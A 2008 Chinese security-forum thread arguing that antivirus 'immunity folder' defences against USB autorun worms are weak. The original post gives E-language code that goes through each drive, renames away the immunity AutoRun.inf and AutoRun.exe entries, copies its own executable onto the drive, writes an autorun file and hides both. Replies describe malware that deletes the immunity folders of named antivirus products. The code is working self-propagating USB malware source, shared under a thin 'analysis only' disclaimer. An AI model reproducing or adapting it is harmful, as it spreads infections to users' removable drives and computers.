[原创]杀软的目录法,防u马没大用-

凝逸反毒

[原创]杀软的目录法,防u马没大用-看我写的u马,只用于技术分析,乱用后果自付,这个方法,已有u马用了,



.版本 2
.子程序 强U马生成
.局部变量 盘名, 文本型
.局部变量 行, 整数型
.局部变量 inf文件, 文本型
.局部变量 exe文件, 文本型

.计次循环首 (取数组成员数 (盘组), 行)
    盘名 ＝ 盘组 [行]
    exe文件 ＝ 盘名 ＋ “AutoRun.exe”
    置文件属性 (inf文件, 32)
    置文件属性 (exe文件, 32)

    置随机数种子 ()

    文件更名 (inf文件, 盘名 ＋ 到文本 (取随机数 (1000000, 99999999)))
    文件更名 (exe文件, 盘名 ＋ 到文本 (取随机数 (1000000, 99999999)))

    复制文件 (取运行目录 () ＋ “\” ＋ 取执行文件名 (), exe文件)
    写到文件 (inf文件, #autorun)
    置文件属性 (exe文件, 4)
    置文件属性 (inf文件, 4)
.计次循环尾 ()


[ 本帖最后由 凝逸反毒 于 2008-12-17 12:25 编辑 ]

凝逸反毒

我见过  不少杀软是这样 防u马的


=====附件=====
运行 也没事,主exe,
主exe 只是生成
.版本 2
    inf文件 ＝ 盘名 ＋ “AutoRun.inf”
    exe文件 ＝ 盘名 ＋ “AutoRun.exe”

[ 本帖最后由 凝逸反毒 于 2008-12-17 12:23 编辑 ]

挪威的冬天

偷天换日?

给个 DEMO 试试看看

dl123100

本来木马制作者如果注意到了这点，防一下也是很简单的事。
手头的一个Nsdownloader的样本，不仅能删安天、360等安软建立的免疫目录，也能删除uplus建立的fat32下的免疫文件。

[ 本帖最后由 dl123100 于 2008-12-17 12:35 编辑 ]

凝逸反毒

原帖由 dl123100 于 2008-12-17 12:30 发表
本来木马制作者如果注意到了这点，防一下也是很简单的事。
手头的一个Nsdownloader的样本，不仅能删安天、360等安软建立的免疫目录，也能删除uplus建立的fat32下的免疫文件。

恩
可 还有杀软 作出这样的功能
为了好看?

多管闲事

现在好多U盘病毒根本不用autorun.inf，直接建立一个假文件夹图标的文件，就有人上去点了。